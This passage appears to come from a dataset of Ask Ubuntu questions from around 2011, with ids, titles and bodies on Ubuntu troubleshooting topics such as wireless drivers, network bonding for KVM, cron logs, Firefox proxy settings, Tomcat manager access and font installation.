permissions here and there . for example , doing chmod 1777 /tmp ( but those things never made the computer work ) . i created a new user and did ls -la /home/alpha : /home/alpha $ ls -la ls : can not access .gvfs : permission denied total 148 drwxr-xr-x 28 alpha alpha 4096 2011-01-24 12:35 . drwxr-xr-x 5 root root 4096 2011-01-24 13:25 .. lrwxrwxrwx 1 alpha alpha 56 2010-08-22 18:46 access-your-private-data.desktop - > /usr/share/ecryptfs-utils/ecryptfs-mount-private.desktop drwx -- -- -- 3 alpha alpha 4096 2011-01-24 12:03 .adobe -rw -- -- -- - 1 alpha alpha 449 2011-01-24 12:35 .bash_history drwx -- -- -- 7 alpha alpha 4096 2011-01-24 12:35 .cache drwx -- -- -- 3 alpha alpha 4096 2011-01-24 12:35 .compiz drwxr-xr-x 8 alpha alpha 4096 2011-01-24 13:24 .config drwx -- -- -- 3 alpha alpha 4096 2011-01-24 10:44 .dbus drwxr-xr-x 2 alpha alpha 4096 2011-01-24 11:49 desktop -rw-r -- r -- 1 alpha alpha 41 2011-01-24 12:35 .dmrc drwxr-xr-x 2 alpha alpha 4096 2011-01-24 11:49 documents drwxr-xr-x 2 alpha alpha 4096 2011-01-24 11:49 downloads lrwxrwxrwx 1 alpha alpha 31 2010-08-22 18:46 .ecryptfs - > /home/.ecryptfs/alpha/.ecryptfs -rw -- -- -- - 1 alpha alpha 16 2011-01-24 11:48 .esd_auth drwxr-xr-x 2 alpha alpha 4096 2011-01-24 12:25 .fontconfig drwx -- -- -- 5 alpha alpha 4096 2011-01-24 12:35 .gconf drwx -- -- -- 2 alpha alpha 4096 2011-01-24 13:26 .gconfd -rw-r -- -- - 1 alpha alpha 0 2011-01-24 12:56 .gksu.lock drwx -- -- -- 8 alpha alpha 4096 2011-01-24 13:24 .gnome2 drwx -- -- -- 2 alpha alpha 4096 2011-01-24 11:49 .gnome2_private -rw-r -- r -- 1 alpha alpha 137 2011-01-24 12:35 .gtk-bookmarks d ? ? ? ? ? ? ? ? ? ? ? ? ? ? .gvfs -rw-r -- r -- 1 alpha alpha 1026 2011-01-24 12:35 .iceauthority -rw -- -- -- - 1 alpha alpha 0 2011-01-24 09:08 .iceauthority.backup drwx -- -- -- 3 alpha alpha 4096 2011-01-24 11:49 .local drwx -- -- -- 3 alpha alpha 4096 2011-01-24 12:03 .macromedia drwx -- -- -- 4 alpha alpha 4096 2011-01-24 11:50 .mozilla drwxr-xr-x 2 alpha alpha 4096 2011-01-24 11:49 music drwxr-xr-x 2 alpha alpha 4096 2011-01-24 11:49 .nautilus drwxr-xr-x 2 alpha alpha 4096 2011-01-24 11:49 pictures lrwxrwxrwx 1 alpha alpha 30 2010-08-22 18:46 .private - > /home/.ecryptfs/alpha/.private drwxr-xr-x 2 alpha alpha 4096 2011-01-24 11:49 public drwx -- -- -- 2 alpha alpha 4096 2011-01-24 12:27 .pulse -rw -- -- -- - 1 alpha alpha 256 2011-01-24 11:48 .pulse-cookie lrwxrwxrwx 1 alpha alpha 52 2010-08-22 18:46 readme.txt - > /usr/share/ecryptfs-utils/ecryptfs-mount-private.txt -rw -- -- -- - 1 alpha alpha 916 2011-01-24 11:53 .recently-used.xbel -rw-r -- r -- 1 alpha alpha 0 2011-01-24 11:48 .sudo_as_admin_successful drwxr-xr-x 2 alpha alpha 4096 2011-01-24 11:49 templates drwxrwxr-x 2 alpha alpha 4096 2011-01-24 11:49 ubuntu one drwx -- -- -- 2 alpha alpha 4096 2011-01-24 11:51 .update-notifier drwxr-xr-x 2 alpha alpha 4096 2011-01-24 11:49 videos -rw -- -- -- - 1 alpha alpha 3634 2011-01-24 13:24 .xsession-errors -rw -- -- -- - 1 alpha alpha 4170 2011-01-24 12:35 .xsession-errors.old but checking permissions by nautilus it tells me .private is owned by `` 1016 - user # 1016 ''
23085	wireless driver for hcl me ( realtek rtl8191sevb ) ?	i recently bought hcl me with windows . i formatted and installed ubuntu netbook version . i am getting wifi is not connection it looks disabled in network place . my network controller is realtek semiconductor co. , ltd rtl8191sevb rev 10 i am unable to get this driver to install can anyone help me ?
23087	u1partial file extension on ubuntu one	i synchronize ubuntu one between my office ( windows 7 ) and my home ( ubuntu 10.10 ) , when i synchronize in windows 7 i can get my files with no problems from web or ubuntu , but when trying to get them later ( modified from ubuntu ) from windows they always make a u1partial file and does n't delete the older one , i delete the u1partial extension and the file works , so the problem is that ubuntu one does n't replace the files . how can i avoid this ?
23090	is it possible to backup individual files with deja dup ?	in the deja dup preferences , it is possible to select certain folders to backup and certain folders to exclude . i would like to be able to backup individual files in my home folder ( such as .vimrc and .bashrc ) , but i do n't see any way to do this . so my question is , is it possible to either select individual files ( instead of whole folders ) to backup , or backup my home folder , but exclude all subfolders ?
23093	turning laptop into wap using netgear wna1100 ? ( stuck at hostapd )	i have a netgear wna1100 usb wifi adapter . i have installed atheros driver from forum details ( btw name of the file is ath9k_htc-installer.1.0.1-maverick-fixed.deb ) . i wish to make a setup like connectify ( windows ) on ubuntu , so that i can connect my phone wirelessly to my laptop via netgear wna1100 ( behaving as ap ) and eventually use internet via my wired lan . i have installed the above mentioned driver , hostapd and hostap-utils . following is my hostapd.conf file . ssid=vks interface=wlan1 # the interface name of the card driver=ath9k_htc # the card driver macaddr_acl=0 accept_mac_file=/etc/hostapd.accept deny_mac_file=/etc/hostapd.deny ieee80211x=1 # use 802.1x authentication auth_algs=1 ignore_broadcast_ssid=0 wpa=2 wpa_passphrase=88888888 wpa_key_mgmt=wpa-psk wpa_pairwise=tkip rsn_pairwise=ccmp when i run sudo hostapd /etc/hostapd/hostapd.conf i get an error invalid/unknown driver 'ath9k_htc # the card driver i think the driver is installed fine , as i can see the blue led blinking on the netgear adapter , which was not blinking earlier . can someone please guide me how to achieve this setup ? i will appreciate an example hostapd.conf file with a simple wpa_psk security setup . please be detailed and descriptive with commands . how to run and end it . following is output from lsmod , i have only pasted the entries which had ath and ath related info . which driver shall i use . module size used by ath9k_htc 42903 0 ath9k_common 2563 1 ath9k_htc ath9k_hw 285176 2 ath9k_htc , ath9k_common ath 13001 2 ath9k_htc , ath9k_hw cfg80211 139811 3 ath9k_htc , mac80211 , ath compat 4020 1 cfg80211 led_class 2633 3 ath9k_htc , thinkpad_acpi , sdhci thanks .
23100	redmine install from repos is having macro problems	i installed redmine from the ubuntu repos and have tried reinstalling it , but i am still having a problem where text is not being replaced thoughout the redmine install . here 's a screenshot to show what i mean : please note that this is redmine 1.0.0
23107	setting up acl on a vps ?	i am relatively new at using linux and have just installed a fresh ( ish ) copy of ubuntu 10.04.1 lts minimal install running on a hypervm vps . how would i enable acl ? i have a question on superuser which resolved the problem i was trying to solve on a virtual machine running ubuntu server 10.10. df -t yields /dev/simfs of type reiserfs - what would i put in fstab to mount acl for the file system ? at the moment this file is blank . after running sudo mount -o remount , acl / i get mount : permission denied . any suggestions ? edit marked as solved as from all the research that i have done it 's been concluded that i am unable to use acl 's on a vps due to permissions .
23108	trying to make file executable on usb , but the permission does n't `` stick ''	i 'm using lastpass as my password manager , and i use sesame for multifactor authentication . on windows this was no problem , but i alternate between windows and linux computers , so i need to have sesame available for both cases . on my laptop i 'm running ubuntu 10.10 , and i downloaded the 32bit lastpass sesame ( ubuntu 10.04 lts ) and moved the files ( an executable and a .bin ) to my usb device . as instructed , i tried to run chmod +x sesame on the executable ( whose name is sesame ) . i tried this from the terminal window , but when doing an ls -la afterwards i noticed that the permissions on the file had n't changed a bit . i tried doing the same adding sudo at the start , but that did n't make any difference either ( and i did n't get any kind of error message or anything ) . i also tried doing it the `` graphical '' way , by right-clicking on the executable in nautilus > properties > permissions , and trying to check off the allow executing file as program check box - the checked marked only disappeared again after a second . if i moved the same executable to my hard drive , it worked very fine to make it executable ( and execute it ) . i 'm not really experienced with linux , so i suspect i 'm missing something obvious . might it have something to do with the usb being fat32 ( but i thought files on a fat32 partition should be executable by default ? ) , and if so - what are my options ? and just to have said it : it works very fine to run the windows version of sesame using wine , but it 's a bit of a hassle ( at least if i need it somewhere wine is n't already installed ) .
23110	show underlined menu items by default	in the previous releases of ubuntu menu items were underlined by default so i didnt have to press alt to show them . however in maverick one has to press alt to view them . how can i set ubuntu to show underlined menu items by default ? is there a setting in gconf-editor ?
23112	ca n't get bonding and bridging to work for kvm	i ca n't for the life of me get bonding and bridging to work for the kvm setup i 'm building . i 'm using a fresh install ( not an upgrade ) of ubuntu server 10.10 . i have 4 nics on the same subnet ( two intended for each of my two vms ) . i 'm trying to achieve the setup that uthark describes here . but following his guidelines did n't work for me . my eth0 and eth1 did not come up , and `` brctl show '' showed that br0 did n't have any interfaces ( the bond ) . i assumed it did n't work because he 's using 10.4 , and this article says there 's a recent change in bonding : [ i ca n't post more than one hyperlink per post because i 'm a newbie . ] i had to use this article to get my interfaces to work at all on the same subnet , which is why i have the post-up lines on some of my interfaces : [ i ca n't post more than one hyperlink per post because i 'm a newbie . ] i installed ifenslave and ethtool . i also created /etc/modprobe.d/aliases.conf with the following content : alias bond0 bonding options bonding mode=6 miimon=100 downdelay=200 updelay=200 and i included `` bonding '' in /etc/modules so , after several approaches , here is my latest interfaces file : auto lo iface lo inet loopback auto eth5 iface eth5 inet manual auto br5 iface br5 inet static post-up /sbin/ip rule add from [ network ] .79 lookup 10 post-up /sbin/ip route add table 10 default via [ network ] .1 src [ network ] .79 dev br5 address [ network ] .79 netmask 255.255.255.0 network [ network ] .0 broadcast [ network ] .255 gateway [ network ] .1 bridge_ports eth5 bridge_stp off bridge_fd 0 bridge_maxwait 0 auto eth2 iface eth2 inet manual auto br2 iface br2 inet static post-up /sbin/ip rule add from [ network ] .78 lookup 11 post-up /sbin/ip route add table 11 default via [ network ] .1 src [ network ] .78 dev br2 address [ network ] .78 netmask 255.255.255.0 network [ network ] .0 broadcast [ network ] .255 gateway [ network ] .1 bridge_ports eth2 bridge_stp off bridge_fd 0 bridge_maxwait 0 iface eth0 inet manual iface eth1 inet manual auto bond0 iface bond0 inet static bond_miimon 100 bond_mode balance-alb up /sbin/ifenslave bond0 eth0 eth1 down /sbin/ifenslave -d bond0 eth0 eth1 auto br0 iface br0 inet static address [ network ] .60 netmask 255.255.255.0 network [ network ] .0 broadcast [ network ] .255 gateway [ network ] .1 bridge_ports bond0 eth2 , eth5 , br2 , and br5 all seem to be working fine . the only other thing i could find that looked suspicious is an error regarding bonding in /var/log/messages : kernel : [ 3.828684 ] bonding : warning : either miimon or arp_interval and arp_ip_target module parameters must be specified , otherwise bonding will not detect link failures ! see bonding.txt for details . even though there is a bond-miimon line in /etc/network/interfaces ( if that 's what they 're talking about ) . also , the bond seems to go in and out of promiscuous mode several times on boot : jan 20 14:19:02 kvmhost kernel : [ 3.902378 ] device bond0 entered promiscuous mode jan 20 14:19:02 kvmhost kernel : [ 3.902390 ] device bond0 left promiscuous mode jan 20 14:19:02 kvmhost kernel : [ 3.902393 ] device bond0 entered promiscuous mode jan 20 14:19:02 kvmhost kernel : [ 3.902397 ] device bond0 left promiscuous mode jan 20 14:19:03 kvmhost kernel : [ 4.998990 ] device bond0 entered promiscuous mode jan 20 14:19:03 kvmhost kernel : [ 4.999005 ] device bond0 left promiscuous mode jan 20 14:19:03 kvmhost kernel : [ 4.999008 ] device bond0 entered promiscuous mode jan 20 14:19:03 kvmhost kernel : [ 4.999012 ] device bond0 left promiscuous mode any advice would be greatly appreciated . it seems that this must be possible , based on other posts , but i ca n't see what i 'm doing wrong . thanks .
23113	upstart , one job definition to start and one to stop	hi i just discoverd ubuntu upstart ( etc/init/* scripts ) . and i would like to use it to run a particular application . this app is run via a command line , but there is an argument to start an instance of the app and another argument to stop it ( let say 'start ' and 'stop ' ) is there a way to use upstart for that ? ?
23116	randomly displayed flashing lines , no response to all shortcuts , just power off . [ syslog included ]	i have an old machine , and i want to use for that to learn employees how to use ubuntu , and to be easyer to switch from windows . i 've been installed 10.04 , and updated , but this strange stuff is happend . graphical installion failed , same strange thing . with alternate workd . sometimes , when i boot up , a boot message displayed : keyboard failure ... , often diplayed after reboot , and after shutdown , when i have n't plugged off from ac . i replaced the keyboard yet , same failure ... if i powered off , and plugged off from ac , no keyboard problems displayed in boot time . details configuration : dell optiplex gx60 - in original cover , no changes . 256 mb ddr 166 mhz intel速 celeron速 processor 2.40 ghz dell 0c3207 base board i know , that is not enough , but i have three other nec compuers , with nearly similar config , and they works well with 9.10 , 10.04 , 10.10 . live cds i 've been tried with 10.04 and 10.10 , but the problem is displayed too . with 9.10 no strange things displayed , but it froze , during a simple apt-get install . syslog an error loop is logged here , but i paste the whole startup and error lines . the flashing lines are displayed sometimes immediately after login , but sometimes after 10 minutes , but once occured , that nothing happend . strange thing is displayed immediately after login : here . an other boot , after some minutes , strange lines , and loop in log appeard : here . the loop should be that : jan 23 00:20:08 machine_name kernel : [ 46.782212 ] [ drm : i915_gem_entervt_ioctl ] *error* reenabling wedged hardware , good luck jan 23 00:20:08 machine_name kernel : [ 47.100033 ] [ drm : i915_hangcheck_elapsed ] *error* hangcheck timer elapsed ... gpu hung jan 23 00:20:08 machine_name kernel : [ 47.100045 ] render error detected , eir : 0x00000000 jan 23 00:20:08 machine_name kernel : [ 47.101487 ] [ drm : i915_do_wait_request ] *error* i915_do_wait_request returns -5 ( awaiting 16 at 9 ) jan 23 00:20:11 machine_name kernel : [ 49.152020 ] [ drm : i915_gem_idle ] *error* hardware wedged jan 23 00:20:11 machine_name gdm-simple-slave [ 1245 ] : warning : unable to load file '/etc/gdm/custom.conf ' : no such file or directory jan 23 00:20:11 machine_name acpid : client 1239 [ 0:0 ] has disconnected jan 23 00:20:11 machine_name acpid : client connected from 1247 [ 0:0 ] jan 23 00:20:11 machine_name acpid : 1 client rule loaded update added syslog things : before errors , error loop , the complete shutdown ( after the big updates ) : jan 28 20:40:30 machine_name rtkit-daemon [ 1339 ] : sucessfully called chroot . jan 28 20:40:30 machine_name rtkit-daemon [ 1339 ] : sucessfully dropped privileges . jan 28 20:40:30 machine_name rtkit-daemon [ 1339 ] : sucessfully limited resources . jan 28 20:40:30 machine_name rtkit-daemon [ 1339 ] : running . jan 28 20:40:30 machine_name rtkit-daemon [ 1339 ] : watchdog thread running . jan 28 20:40:30 machine_name rtkit-daemon [ 1339 ] : canary thread running . jan 28 20:40:30 machine_name rtkit-daemon [ 1339 ] : sucessfully made thread 1337 of process 1337 ( n/a ) owned by '1001 ' high priority at nice level -11 . jan 28 20:40:30 machine_name rtkit-daemon [ 1339 ] : supervising 1 threads of 1 processes of 1 users . jan 28 20:40:32 machine_name rtkit-daemon [ 1339 ] : sucessfully made thread 1345 of process 1337 ( n/a ) owned by '1001 ' rt at priority 5 . jan 28 20:40:32 machine_name rtkit-daemon [ 1339 ] : supervising 2 threads of 1 processes of 1 users . jan 28 20:40:32 machine_name rtkit-daemon [ 1339 ] : sucessfully made thread 1349 of process 1337 ( n/a ) owned by '1001 ' rt at priority 5 . jan 28 20:40:32 machine_name rtkit-daemon [ 1339 ] : supervising 3 threads of 1 processes of 1 users . jan 28 20:40:37 machine_name pulseaudio [ 1337 ] : ratelimit.c : 2 events suppressed jan 28 20:41:33 machine_name aptdaemon : info : initializing daemon jan 28 20:41:44 machine_name kernel : [ 167.691563 ] lo : disabled privacy extensions jan 28 20:47:33 machine_name aptdaemon : info : quiting due to inactivity jan 28 20:47:33 machine_name aptdaemon : info : shutdown was requested jan 28 20:59:50 machine_name kernel : [ 1253.840513 ] lo : disabled privacy extensions jan 28 21:17:02 machine_name cron [ 1874 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) jan 28 21:17:38 machine_name kernel : [ 2321.553239 ] lo : disabled privacy extensions jan 28 22:07:44 machine_name kernel : [ 5327.840254 ] lo : disabled privacy extensions jan 28 22:17:02 machine_name cron [ 2665 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) jan 28 22:32:38 machine_name sudo : pam_sm_authenticate : called jan 28 22:32:38 machine_name sudo : pam_sm_authenticate : username = [ some_user ] jan 28 22:32:38 machine_name sudo : pam_sm_authenticate : /home/some_user is already mounted jan 28 22:57:03 machine_name kernel : [ 8286.641472 ] lo : disabled privacy extensions jan 28 22:57:24 machine_name sudo : pam_sm_authenticate : called jan 28 22:57:24 machine_name sudo : pam_sm_authenticate : username = [ some_user ] jan 28 22:57:24 machine_name sudo : pam_sm_authenticate : /home/some_user is already mounted jan 28 23:07:42 machine_name kernel : [ 8925.272030 ] [ drm : i915_hangcheck_elapsed ] *error* hangcheck timer elapsed ... gpu hung jan 28 23:07:42 machine_name kernel : [ 8925.272048 ] render error detected , eir : 0x00000000 jan 28 23:07:42 machine_name kernel : [ 8925.272093 ] [ drm : i915_do_wait_request ] *error* i915_do_wait_request returns -5 ( awaiting 171453 at 171452 ) jan 28 23:07:45 machine_name kernel : [ 8928.868041 ] [ drm : i915_gem_idle ] *error* hardware wedged jan 28 23:08:10 machine_name acpid : client 925 [ 0:0 ] has disconnected jan 28 23:08:10 machine_name acpid : client connected from 8127 [ 0:0 ] jan 28 23:08:10 machine_name acpid : 1 client rule loaded jan 28 23:08:11 machine_name kernel : [ 8955.046248 ] [ drm : i915_gem_entervt_ioctl ] *error* reenabling wedged hardware , good luck jan 28 23:08:12 machine_name kernel : [ 8955.364016 ] [ drm : i915_hangcheck_elapsed ] *error* hangcheck timer elapsed ... gpu hung jan 28 23:08:12 machine_name kernel : [ 8955.364027 ] render error detected , eir : 0x00000000 jan 28 23:08:12 machine_name kernel : [ 8955.364407 ] [ drm : i915_do_wait_request ] *error* i915_do_wait_request returns -5 ( awaiting 171457 at 171452 ) jan 28 23:08:14 machine_name kernel : [ 8957.472025 ] [ drm : i915_gem_idle ] *error* hardware wedged jan 28 23:08:14 machine_name acpid : client 8127 [ 0:0 ] has disconnected jan 28 23:08:14 machine_name acpid : client connected from 8141 [ 0:0 ] jan 28 23:08:14 machine_name acpid : 1 client rule loaded jan 28 23:08:15 machine_name kernel : [ 8958.671722 ] [ drm : i915_gem_entervt_ioctl ] *error* reenabling wedged hardware , good luck jan 28 23:08:15 machine_name kernel : [ 8958.988015 ] [ drm : i915_hangcheck_elapsed ] *error* hangcheck timer elapsed ... gpu hung jan 28 23:08:15 machine_name kernel : [ 8958.988026 ] render error detected , eir : 0x00000000 jan 28 23:08:15 machine_name kernel : [ 8958.989400 ] [ drm : i915_do_wait_request ] *error* i915_do_wait_request returns -5 ( awaiting 171459 at 171452 ) jan 28 23:08:16 machine_name init : tty4 main process ( 848 ) killed by term signal jan 28 23:08:16 machine_name init : tty5 main process ( 856 ) killed by term signal jan 28 23:08:16 machine_name networkmanager : nm_signal_handler ( ) : caught signal 15 , shutting down normally . jan 28 23:08:16 machine_name init : tty2 main process ( 874 ) killed by term signal jan 28 23:08:16 machine_name init : tty3 main process ( 875 ) killed by term signal jan 28 23:08:16 machine_name init : tty6 main process ( 877 ) killed by term signal jan 28 23:08:16 machine_name init : cron main process ( 890 ) killed by term signal jan 28 23:08:16 machine_name init : tty1 main process ( 1146 ) killed by term signal jan 28 23:08:16 machine_name avahi-daemon [ 644 ] : got sigterm , quitting . jan 28 23:08:16 machine_name avahi-daemon [ 644 ] : leaving mdns multicast group on interface eth0.ipv4 with address 10.238.11.134 . jan 28 23:08:16 machine_name acpid : exiting jan 28 23:08:16 machine_name init : avahi-daemon main process ( 644 ) terminated with status 255 jan 28 23:08:17 machine_name kernel : kernel logging ( proc ) stopped . jan 28 23:09:00 machine_name kernel : imklog 4.2.0 , log source = /proc/kmsg started . jan 28 23:09:00 machine_name rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 4.2.0 '' x-pid= '' 516 '' x-info= '' http : //www.rsyslog.com '' ] ( re ) start jan 28 23:09:00 machine_name rsyslogd : rsyslogd 's groupid changed to 103 jan 28 23:09:00 machine_name rsyslogd : rsyslogd 's userid changed to 101 jan 28 23:09:00 machine_name rsyslogd-2039 : could no open output file '/dev/xconsole ' [ try http : //www.rsyslog.com/e/2039 ] when i hit the on/off button , the system shuts down normally . may be it a hardware problem , but i do n't know ... can you say something useful to solve my problem ?
23117	configuring firefox to use a proxy from the command line	i 'm looking for a way to tell firefox to use a proxy in ubuntu ludid ( 10.04.1 lts ) . i 'm installing ubuntu semi-automatically on several identical machines . for this , i use a script that , amongst other things , sets system-wide proxy settings : echo `` export http_proxy=http : //myproxy:3128/ '' > /etc/profile.d/proxy.sh echo `` export http_proxy=http : //myproxy:3128/ '' > > /etc/profile.d/proxy.sh chmod a+x /etc/profile.d/proxy.sh i can confirm that the variables are set correctly when checking in a shell . most programs respect this setting and use my proxy . firefox , however , does not . when i open its network connection settings dialog , however , it is pre-set to `` use system settings '' for the proxy . what does firefox expect here ? a differently-named variable ? can i set something in ff 's prefs.js ?
23120	what would be most efficient pc configuration for professional non-linear video editing ?	i 'm a broadcaster with editing experience in final cut pro and some avid work . over the past few months , i have been eagerly awaiting the linux foss release of lightworks , an award-winning non-linear video editor . on their website lightworks beta release , it mentions that the program can make use of your gpu for faster and smoother computing . with that being said , what would be the best system components to purchase individually so that i may assemble my own custom professional desktop editor ?
23126	how to make in cli check for updates to be happening every 4 weeks and install them automatically without going to software sources ?	i have a set of custom commands i run on my computers after i install them . how do i make ubuntu check for updates every 4 weeks and install them automatically on check ? i would need this done via command line so i can set it up for usual users when i set up their computers . the first command will make the update manager check for updates every 2 weeks because they not always come so much and to save the bandwidth of the ubuntu servers . i also need to set it so that users do n't need to click to install updates since it 's tiring every time i help a friend set up a computer .
23128	how do i execute a file from a fat usb drive ?	i 'm trying to install a portable app onto my usb drive such that it is compatible with both ubuntu and windows ( specifically , a program called etoys ) . support is already built into the app for both operating systems - there 's etoys.sh for ubuntu and etoys.exe for windows . i decided to install onto a fat drive since that can be read from both systems . this works fine for windows , but for some reason i can not execute etoys.sh on ubuntu . the problem is not with the file - when the whole folder is copied to the local hard drive , the app works great in ubuntu . but when i try to execute it from the usb , it opens the file in a text editor . i then tried to run it from a terminal , but i got the message permission denied . i 've had the same problem with other executables as well . is there an easy way to execute things from a usb stick ?
23134	how to run turbotax online ?	i want to use turbotax online to do my income tax but apparently ubuntu ( or any other flavor of linux ) is not supported . is there any way around this ? i have chrome and firefox but both get the `` not supported '' page at turbotax website .
23137	cron.daily seems to run but does n't log any activity	we have a number of scripts setup to run in the /etc/cron.daily directory - some of them show evidence of being run at about the right time ( files are archived/compressed and truncated ) , but others seem to be ignored . checking both /var/log/cron.log and /var/log/syslog lists none of the daily jobs - only the hourly ( and a couple of 20 minute jobs ) . is there some other log somewhere ? the crontab contains these lines : 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 4 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly )
23158	intel wireless n 5300 - personal area network support	my wireless card supports what intel calls `` mywifi '' which means that it can act as an access point for other computers . how can i discover if this is supported in ubuntu ?
23163	how to edit hosts.deny and hosts.allow ?	i want to block some hosts in ubuntu , so how could i edit hosts.deny file to block some hosts like example.com . and one more thing i have installed dnsmasq in ubuntu , so can i check the entries of the dns 's cached by dnsmasq ? if yes then how ? thanks in advance .
23165	is there an application to remove unity ui ?	after trying two versions of ubuntu desktop on cd and one on usb and then must go back to windows , finally i decided to install ubuntu netbook . however , the unity interface makes me confused . i wanted to use the interface similar to the previous desktop versions i have tried . i have read some messages here , but do not understand them . is there any application to run to remove the unity instead of manually doing that , or could someone here provide step-by-step safe-procedure to remove unity ?
23169	how to build packages for maverick while running lucid ?	i would like to be able to build a package for the maverick distribution release of ubuntu , while running the lucid distribution release . i found this page : https : //wiki.ubuntu.com/debootstrapchroot which seems to explain what i would like to do . however , the instructions say to go to a specific website ( the link is in the article , i ca n't post more than one link ) and download the debootstrap package that has the first word of the distribution relase appended ( eg . `` maverick '' ) , but no such package exists . what do i do ?
23173	will the logitech couch mouse work ?	will the logitech couch mouse work out-of-the-box on ubuntu ? or do i need to install drivers ? they fully support windows and mac , but do n't say anything about linux .
23180	why does gvim start up slower than vim ?	i compiled vim 7.3 on my ubuntu 10.04 , and here is the configure option : ./configure -- disable-selinux -- enable-luainterp -- enable-perlinterp -- enable-rubyinterp -- enable-cscope -- enable-multibyte -- enable-xim -- enable-gui=gnome2 -- enable-pythoninterp=yes -- with-features=huge vim starts up quickly in the console , while gvim does not respond to any keyboard or mouse action for about 3 or 4 seconds after the window appears . the file i asked gvim to open can show up very quickly though . the only option in .gvimrc is set guioptions=-t. and this problem does not appear in the gvim7.2 installed in aptitude repository i analyzed using the -- startuptime option , the time is relative short , so the delay does not caused in startuptime . can it be a delay after startup somehow ?
23181	connected wireless connection , but no wlan0 . what 's causing this ?	i 'm connecting ( to the internet ) over a wireless connection ( as in , it 's already connected ) , but there 's no wlan0 . output produced by ifconfig : eth0 link encap : ethernet hwaddr 5c : ff:35:06:9c : b3 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 eth1 link encap : ethernet hwaddr 00:26:82:76:6d : ee inet addr:192.168.1.3 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :226:82ff : fe76:6dee/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:245381 errors:0 dropped:0 overruns:0 frame:160579 tx packets:274599 errors:16 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:193751818 ( 193.7 mb ) tx bytes:32692764 ( 32.6 mb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:409 errors:0 dropped:0 overruns:0 frame:0 tx packets:409 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:31117 ( 31.1 kb ) tx bytes:31117 ( 31.1 kb ) the connection i 'm `` using '' is obviously eth1 . just wanted to fix it , as a great conky script does n't work ( wireless network link strength indicator ) ps . nm-applet does show my wireless network link strength without a hitch .
23183	how do i disable ubuntu one ?	i do not use ubuntu one but that ubuntu one ribbon keeps appearing when i open some folders . as i do n't use ubuntu one and do n't intend to use it in near future , is there a way that ubuntu one support completely goes away from my laptop ? something like apt-get remove u1-support so i no longer see that ribbon nor the preferences menu entry ?
23187	dyndns updater ?	back in windows , i had a dyndns updater which showed a little icon in the task bar ... it was a launch-and-forget little app . i want to know if there is something similar in ubuntu . specifically , i 'd like to have some kind of notification applet which shows status , that is , whether ip is currently updated or not . is there anything like that ? or should i stick to command-line-only apps ?
23189	wvdial randomly drops 3g connection - how to auto-reconnect ?	i 'm using a 3g modem for a router running ubuntu server 10.04 . i have the connection established using wvdial , which works successfully , but sometimes the connection drops . i would like it to auto re-connect . i 've set the `` auto reconnect '' in wvdial.conf , but this does not seem to work . any ideas ? am i missing a config option , or should i try writing a script which polls the network status and resets if ppp0 has gone down ?
23191	tomcat6 manager	i 've just installed ubuntu 10.04 lts server with lamp support . tomcat6 seems to run ok . but , i am unable to get into the manager-webapp ... i 've updated the tomcat-users.xml file : < ? xml version='1.0 ' encoding='utf-8 ' ? > < tomcat-users > < role rolename= '' tomcat '' / > < role rolename= '' role1 '' / > < role rolename= '' manager '' / > < role rolename= '' admin '' / > < user username= '' tomcat '' password= '' tomcat '' roles= '' tomcat , manager , admin '' / > < user username= '' both '' password= '' tomcat '' roles= '' tomcat , role1 '' / > < user username= '' role1 '' password= '' tomcat '' roles= '' role1 '' / > < user username= '' admin '' password= '' admin '' roles= '' manager , admin '' / > < /tomcat-users > but , no matter what i try , it keeps rejecting my username/password combo . what might i be missing ?
23195	does the global application menu support java applications ?	i am a heavy user of java applications such as matlab and maple . will the global menu support these very important packages ? if not , are there plans to do this ?
23198	how to increase wubi /root disk space	i 'm running out of space in wubi . online wubi help did n't help much since they suggest creating extra virtual disk space ( similar to having a diffrent partition i guess ) . none of them speak about increasing the size of /root disk space ( or root.disk ) . i store all files in space shared with windows or external disk and use ubuntu only to install and use softwares and browsing . so how do increase the available space for installing more softwares ?
23200	how can i edit font metadata in the uds ( universal directory service ) ?	i 've renamed this to reflect what i 've learned . the details below track the issue . original post : i 'm trying to install a set of opentype helvetica fonts . the font installation is failing because the `` thin '' fonts are described in the font properties as `` light '' , triggering a `` this font is already installed on your system '' error . when i open either font in kfontview , the font name is `` helvetica , light '' . when i click on file properties and go to the `` information '' tag , the `` font.weight '' is `` light '' for both fonts . when i open up the fonts in fontforge , the thin font says `` thin '' and the light font says `` light '' . when i save the thin font as an sfd file from fontforge and open it in kate , the string `` light '' ca n't be found . when i open up the thin font binary ( oft ) in kate the string `` light '' ca n't be found . i 'm pretty sure i want to change the font.weight property of the thin files to be `` thin '' so that a ) i can install them and b ) their metadata will be correct . but for the life of me i ca n't figure out where the font properties on the properties dialog are even stored ; much less how to change them . the only potential solution i 've come up with so far ( and i have n't tried it ) is to install the thin fonts , go into the font-config database to correct the names , and then install the light fonts . aside from being a pita and presumably losing my changes if i have to reinstall the fonts , this just seems like a bad idea . i 'm happy to provide more information as requested . revision ( 27 jan 2010 ) additional information : this is strictly a qt or kde issue . moving the fonts into /usr/local/share/fonts and then calling `` fc-cache '' installs the fonts just fine . these fonts still do n't appear in the kde font installer , however . looking ( lightly ) at the source code , the font metadata that is messing up kde is possibly stored in the uds . there are too many generic terms for google to be much help ; so i 'm not sure if the uds is owned by the filesystem ( ext3 ) , the qt toolkit , or ( not likely ) by kde . kmail treats fonts like ms office on windows . it hides all but the font family from the user and expects to find just bold , italic , and bold italic 